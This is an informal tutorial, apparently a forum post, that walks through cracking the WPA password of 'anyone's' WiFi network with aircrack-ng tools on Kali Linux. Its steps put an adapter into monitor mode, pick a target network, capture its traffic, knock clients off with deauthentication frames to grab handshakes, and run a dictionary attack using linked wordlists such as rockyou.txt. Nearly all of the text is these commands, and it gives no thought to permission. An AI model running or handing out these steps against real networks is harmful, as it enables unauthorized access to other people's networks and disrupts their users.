Hacking WiFi Passwords of Anyone Free ! :D
REQUIREMENTS :
- Kali Linux OS (download from https://www.kali.org/downloads/ and install/or run Live first option :Live AMD64
- External WiFi Adapter that support monitor mode
- Dictionary Wordlist that may contain Wifi Passwords
Download one of these
http://www.mediafire.com/view/7d7nz2kku7urzor/rockyou.txt
http://www.mediafire.com/file/qk1m9vewvk868yp/BIG-WPA-LIST-1.rar
http://www.myhomereviewsblog.com/wp-content/uploads/2016/02/BIG-WPA-LIST-22.rar
http://www.myhomereviewsblog.com/wp-content/uploads/2016/02/BIG-WPA-LIST-22.rar
https://www.4shared.com/rar/7I1dCSBZba/BIG-WPA-LIST-3.html
Step 1. in Kali linux > Select terminal from left Corner i.e"Black command Interface tool"
Step 2. type> cd desktop
Step 3. Go to Monitor Mode
type> airmon-ng
to get adapter type like mine is wlan0
type> airmon-ng start wlan0
Step 4. Show all WiFi networks Details
type> airodump-ng wlan0mon
Press CTRL+C to stop and select your target > note BSSID + Channel for later use of that network
Step 5. Capture the packets of WiFi network
type> airodump-ng -c [channel] --bssid [bssid] -w [packets-save] wlan0mon
Step 6. Kickoff clients from network
type> aireplay-ng -0 2 -a [bssid] wlan0
Wait for Handshakes that is required for cracking at top-left corner : here:
Step 7. Dictionary attack on captured handshakes of wifi
type> aircrack-ng -a2 -b [bssid] -w [wordlist-location] [handshakes-files-location/*.cap]
RESULT :
Cracking Starts up for password > After few minutes or hours password will reveal
like
YAHOOOOO.............! :) ;)